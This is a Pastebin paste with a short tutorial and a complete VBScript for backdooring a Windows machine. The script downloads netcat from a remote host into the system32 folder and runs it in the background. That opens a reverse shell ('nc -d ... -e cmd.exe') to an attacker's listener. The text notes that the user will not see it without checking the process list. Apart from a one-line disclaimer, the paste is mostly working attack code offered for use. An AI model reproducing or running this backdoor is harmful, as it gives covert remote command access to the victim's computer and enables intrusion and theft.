Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://joncraton.org/blog/46/netcat-for-windows/
- Download nc111nt.zip (password:nc) - Netcat for Windows
- Create a backdoor into a Windows system
- Using VBScript and netcat it is quite simple to create a basic backdoor into a users system with the priviledges of the user that ran the script. It's a very basic concept and all it does it download the netcat program (nc.exe) from a trusted website into the users c:\windows\system32 folder. What this does is allow you to run netcat from the command line without dealing with the full location of nc.exe. Once the file is in the system32 folder it can simple be run from any command prompt.
- ***This is a proof of concept and should not be used for illegal purposes. Only use this in your own test environment and I take no responsibility if you mess something up with this***
- To set this up, you need to have a computer running netcat waiting for the incomming connection. To do that just run a simple command such as:
- nc -l 1337
- That's when we tell the script to run the following netcat command:
- nc -d 10.0.0.8 1337 -e cmd.exe
- What this does is tell netcat to connect to the IP 10.0.0.8 on TCP port 1337. The -e switch tells netcat to execute cmd.exe and output it to the server waiting for the connection. The -d switch tells netcat to run in the background in a Windows environment. The user won't even know it's running without checking the process list.
- Here's an example script that will automatically download nc.exe, write it to c:\windows\system32 and then execute the netcat command to connect to the remote server:
- ' Set your settings
- strFileURL = "http://10.0.0.10/nc.exe"
- strHDLocation = "C:\WINDOWS\system32\nc.exe"
- ' Fetch the file
- Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
- objXMLHTTP.open "GET", strFileURL, false
- objXMLHTTP.send()
- If objXMLHTTP.Status = 200 Then
- Set objADOStream = CreateObject("ADODB.Stream")
- objADOStream.Open
- objADOStream.Type = 1 'adTypeBinary
- objADOStream.Write objXMLHTTP.ResponseBody
- objADOStream.Position = 0 'Set the stream position to the start
- Set objFSO = Createobject("Scripting.FileSystemObject")
- If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
- Set objFSO = Nothing
- objADOStream.SaveToFile strHDLocation
- objADOStream.Close
- Set objADOStream = Nothing
- End if
- Set objXMLHTTP = Nothing
- Set objShell = CreateObject("WScript.Shell")
- ' Execute the connection
- objShell.Exec("nc -d 10.0.0.8 1337 -e cmd.exe")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement